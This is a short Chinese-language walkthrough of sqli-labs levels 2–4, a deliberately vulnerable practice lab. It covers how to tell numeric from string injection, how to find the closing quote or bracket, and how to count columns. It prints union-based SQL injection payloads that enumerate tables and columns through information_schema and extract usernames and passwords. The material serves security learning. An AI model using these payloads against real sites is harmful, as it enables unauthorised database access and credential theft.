sqli-labs注入之2至4关

前言：此部分主要记录sqli-labs闯关2-4，其中我觉得最重要的如何判断闭合符号

第二关

首先判断是整形注入还是字符型注入


由上图可知为数值型注入，即不需任何闭合符号。
判断列数


可知列数为3
判断显示位

爆出数据库

由数据库得出表名
?id=-1 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=‘security’),3–+
（纯手敲）

由表名得到列名
?id=-1 union select 1,(select group_concat(column_name)from information_schema.columns where table_schema=‘security’ and table_name=‘users’),3–+

获取，列中信息
?id=-1 union select 1,(select concat_ws(char(32,58,32),username,password) from users limit 1,1),3–+

第三关

首先判断
什么类型注入


可知为字符型注入，即需判断闭合符号
首先判断‘和"即


如果哪个报错，则为那个符号
在输入–+注释符，如果不报错则闭合符号为此符号，如果报错，则再加个括号。
经判断，第三关闭合符号为‘），其余步骤和第一关一样。

第四关

经判断为字符型注入

经判断，闭合符号为”），后面步骤和第一关一样。